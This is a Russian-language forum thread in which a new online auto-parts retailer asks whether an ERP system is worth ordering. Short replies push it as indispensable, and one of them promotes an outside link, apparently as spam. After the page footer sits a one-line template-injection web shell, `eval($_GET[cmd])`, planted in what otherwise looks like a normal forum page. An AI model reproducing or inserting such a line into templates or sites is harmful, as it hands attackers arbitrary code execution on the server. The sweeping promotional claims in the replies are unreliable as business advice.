+ Ответить в теме
Показано с 1 по 4 из 4

Тема: ERP, стоит ли заказывать для интернет магазина автозапчастей?


  1. #1

    ERP, стоит ли заказывать для интернет магазина автозапчастей?

    ERP, стоит ли заказывать для интернет магазина автозапчастей по МСК? Какие вообще преимущества дает данная система? Открываю собственный интернет-магазин но в сайтостроение я ноль, только вникаю в тему. Может тут есть люди в теме которые мне смогут что-то посоветовать?

  2. #2
    Новичок Serf is on a distinguished road Аватар для Serf
    Регистрация
    05.04.2019
    Сообщений
    136
    Сейчас все крупные интернет-магазины без ERP просто бы не смогли существовать. Это обязательная система для любого интернет-магазина или сервиса в интернете. Вы подробно почитайте какие преимущество предоставляет ERP система.

  3. #3
    Теоретически без ERP интернет-магазин может работать, но ввести такой бизнес будет намного сложнее. ERP система очень сильно упрощает большинство бизнес процессов, что позволяет сократить количество сотрудников. В общем с ней одни экономии.

  4. #4
    Новичок Devid is on a distinguished road Аватар для Devid
    Регистрация
    05.04.2019
    Сообщений
    132
    Думаю вам стоит прочитать подробную статью с сравнительной таблицей о том, какие преимущества может дать ERP система бизнесу и как ее могут использовать, к примеру вот наглядная - https://www.nopos.ru/page9724659.html . Думаю, что после прочтения у вас будет один вывод - ее нужно обязательно заказывать, а какую уже ваш решать. Можно под индивидуальный заказ, а можно найти готовое решение, все зависит от того, хватит ли вам того функционала, который позволяет готовое решение.

+ Ответить в теме

Похожие темы

  1. Ответов: 19
    Последнее сообщение: 02.04.2024, 09:11
  2. Ответов: 6
    Последнее сообщение: 02.05.2023, 21:41
  3. Ответов: 6
    Последнее сообщение: 02.05.2023, 20:58
  4. Раскрутка интернет магазина
    от Кузьмич в разделе Курилка
    Ответов: 6
    Последнее сообщение: 23.03.2021, 09:46
  5. Ответов: 3
    Последнее сообщение: 30.03.2020, 06:07

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}